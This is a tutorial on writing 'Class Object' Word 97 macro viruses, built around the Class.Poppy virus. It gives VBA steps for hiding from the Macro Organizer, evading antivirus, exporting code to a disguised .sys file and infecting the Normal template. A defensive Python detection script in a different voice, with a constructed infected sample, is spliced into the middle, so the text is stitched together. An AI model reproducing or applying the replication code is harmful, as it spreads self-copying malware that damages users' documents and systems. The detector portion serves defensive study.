What is "Class Object Infection" ?
by VicodinES /CB /TNN
*What is it? Is it any better than a regular macro virus?
Currently all Word 97 macro viruses contain Modules, and these Modules then contain the macro subroutines and functions. A "Class Object" macro virus does not have a
Module and therefore cannot be seen in the Word 97 Macro Organizer. This gives us our first advantage - you no longer have to bother hooking File|Templates, because
even if the user pulls up the File|Templates menu they will not see any macros! "Class" macros cannot be seen in the "Macro Organizer".
Now you see one advantage, but there are others. A "Class Macro" cannot simply be deleted from the Visual Basic Editor. So even if the user discovers your "Class Virus",
he/she must actually highlight the code, select it and then delete it. It's not as easy as just deleting a module. Plus, if they do not look closely enough they may just think
Word is mistaken and that they do not have a virus, since there are no Modules in the document. Also, many AV products use the Module name to help them find and identify a
macro virus, but a "Class Virus" does not have a Module name, so they must rely on a scan string.
*What are the rules of a "Class Virus" ?
A "Class Virus" has a few constraints that differ from a regular Word 97 macro virus. First, you cannot have the same subroutine or function in both an infected document
and an infected normal template. For example, this is a list of the subroutines in Class.Poppy:
Infected Document      Infected Normal Template
AutoOpen               AutoClose
ViewVBCode             ToolsMacro
The code is essentially the same (except for a few minor changes) in both the infected document and the infected normal template, but the subroutine names have to be
different. Also, you cannot have public variables; they must all be private. I decided to just stay away from private declarations to make it easier for my first "Class
Virus".
*How does it work? How can I write one?
The first thing to figure out is where to write your code. The virus code is written in the "Microsoft Word Objects" section of the Visual Basic Editor. This is where you
write your subroutines.
To reference your code you must always point to Item(1) in the Visual Basic components, as in this example of Item(1) for the active document:
ActiveDocument.VBProject.VBComponents.Item(1)
Item(1) is always the "ThisDocument" part of your Word document(^1). This is the section you want to infect.
You will also need to figure out whether you are already installed. You cannot use the old method of checking for your module name in all the Visual Basic components, because
there is no module or module name. The way to check is to see whether any code exists in Item(1). 99.9% of the time this section of documents and templates will be empty,
so all you have to do is check for any code. Just count the number of lines, and if there are zero lines of code then it's safe to infect. For example, this check of a normal
template:
NormalTemplate.VBProject.VBComponents.Item(1).codemodule.CountOfLines
So if the value returned is not zero then you're already installed, but if the value is zero then you need to infect the normal template.
Getting your code out of the active document and into the normal template (to infect the normal template) is a bit tricky. You cannot simply copy the code there.
OrganizerCopy and WordBasic.MacroCopy do not work, and you can't just Export and then Import code into Item(1). The first thing to do is get your code out of the active
document. You can do this with the basic Export function, such as this example from Class.Poppy:
ActiveDocument.VBProject.VBComponents.Item(1).Export "c:\class.sys"
I exported it to class.sys just because .sys files are hidden files by default. You could use any name you want, but I decided to use sys because it looks like it should
be there if the user stumbles on to it.
Now that we have exported our code we need to bring it into the normal template to complete the infection. The way to do this is to add it from the file class.sys (the
Import command will not work). This example from Class.Poppy shows how it's done:
Set host = NormalTemplate.VBProject.VBComponents.Item(1)
host.codemodule.AddFromFile ("c:\class.sys")
I set "host" as the object to import into since it's easier to continue to reference "host".
OK, so we imported our code (class.sys) into the normal template, but there is a big BIG problem. The first four lines are invalid. We imported these lines of code as well (they
are automatically generated during the export):
VERSION 1.0 CLASS
BEGIN
MultiUse = -1 'True
End
That is going to cause an error in our code and we need to remove it! That can easily be done with the DeleteLines command. For example (notice I still reference "host"
from above):
With host.codemodule
    For x = 1 To 4
        .deletelines 1
    Next x
End With
I delete line 1 four times. This way I remove all the extra code that I don't need and don't want.
So are we done? Nope! We now have two identical code modules in Item(1). Both have the subroutine AutoOpen, and as I stated before that will not work - Word will give us
an error and we will fail to spread. So what we need to do is replace "Sub AutoOpen()" with something else. What we can do is replace it (in the normal template only)
with a new subroutine name, one that works well for infection. I decided to go with AutoClose so all documents that are closed will become infected. Here is the
example:
host.codemodule.replaceline 1, "Sub AutoClose()"
I knew "Sub AutoOpen()" would be line 1 since I previously just removed the first four lines.
*Are we done?
And that should do it. We managed to check whether we were installed. Then, since we weren't, we exported our code and added it in for the infection. We cleaned up our
extra lines and did the subroutine name change. That's all it takes :-) ... well, a few other things can be done, such as polymorphism, a payload and some stealth. Check
out the code for Class.Poppy if you want to see how that is done.
*Any extra suggestions?
Oh OK - the most fun thing you can do is swap your Item(1) name just before you export your code. This way the virus will adapt its Item(1) name to any non-English
version of Word. It can be done like this:
ActiveDocument.VBProject.VBComponents.Item(1).Name = _
NormalTemplate.VBProject.VBComponents.Item(1).Name
Do this right before your export: if the normal template's Item(1) has a different name than the document's Item(1), then it will adopt this new name, and if the names are
the same then nothing will change!
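A defender-side use of the same observations (code in Item(1) is abnormal, the export header, auto-run entry points, and the component name varying by locale): an added Python triage routine, not Class.Poppy's code or the author's, run here on a constructed sample of an exported ThisDocument. It assumes the VBA source has already been dumped to text by a macro extraction tool; the indicator lists and verdict names are my own.

```python
import re

# Procedure names Word runs on its own (the article uses AutoOpen/AutoClose).
AUTO_PROCS = ("AutoOpen", "AutoClose", "AutoExec", "AutoNew", "AutoExit",
              "Document_Open", "Document_Close", "Document_New")
SELF_MOD_MARKERS = ("VBProject", "VBComponents", "CodeModule", ".Export",
                    "AddFromFile", "DeleteLines", "ReplaceLine")  # code-copying members
AUTO_RE = re.compile(r"^\s*(?:Public\s+|Private\s+)?Sub\s+("
                     + "|".join(AUTO_PROCS) + r")\s*\(", re.I | re.M)
HEADER_RE = re.compile(r"^VERSION\s+1\.0\s+CLASS\s*$", re.I | re.M)

def is_class_module(src):
    """Key on the header Export writes, not on the locale-dependent name 'ThisDocument'."""
    return bool(HEADER_RE.search(src))

def code_lines(src):
    """Code lines minus the export header block and Attribute lines (~CountOfLines)."""
    lines, in_header = [], False
    for raw in src.splitlines():
        s = raw.strip()
        if s.upper().startswith("VERSION 1.0 CLASS"):
            in_header = True                   # the 4-line block the article deletes
        elif in_header:
            in_header = s.upper() != "END"
        elif s and not s.startswith("Attribute "):
            lines.append(s)
    return lines

def analyze(src):
    """Return (verdict, auto_procs, markers) for one extracted VBA component."""
    auto = sorted({m.group(1) for m in AUTO_RE.finditer(src)})
    markers = [m for m in SELF_MOD_MARKERS if m.lower() in src.lower()]
    if is_class_module(src) and auto and markers:
        verdict = "suspicious"                 # auto-run entry point plus code-copying calls
    elif auto or markers:
        verdict = "review"
    else:
        verdict = "clean"                      # includes the usual empty ThisDocument
    return verdict, auto, markers

# Constructed sample: an exported ThisDocument whose AutoOpen copies itself with the calls the article quotes.
SAMPLE = """VERSION 1.0 CLASS
BEGIN
  MultiUse = -1  'True
END
Attribute VB_Name = "ThisDocument"
Sub AutoOpen()
    ActiveDocument.VBProject.VBComponents.Item(1).Export "c:\\class.sys"
    NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.AddFromFile "c:\\class.sys"
End Sub"""
```

Any non-zero line count from code_lines on a ThisDocument component is already worth a look, since the article itself notes that section is almost always empty.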
Peace, VicodinES
Facts:
Class.Poppy was the first virus to do any of this.
Slage Hammer helped me test on Non-English versions.
The export to sys file was first done by Reptile/29A.
Footnote:
^1 - it may be called other things in non-English versions of Word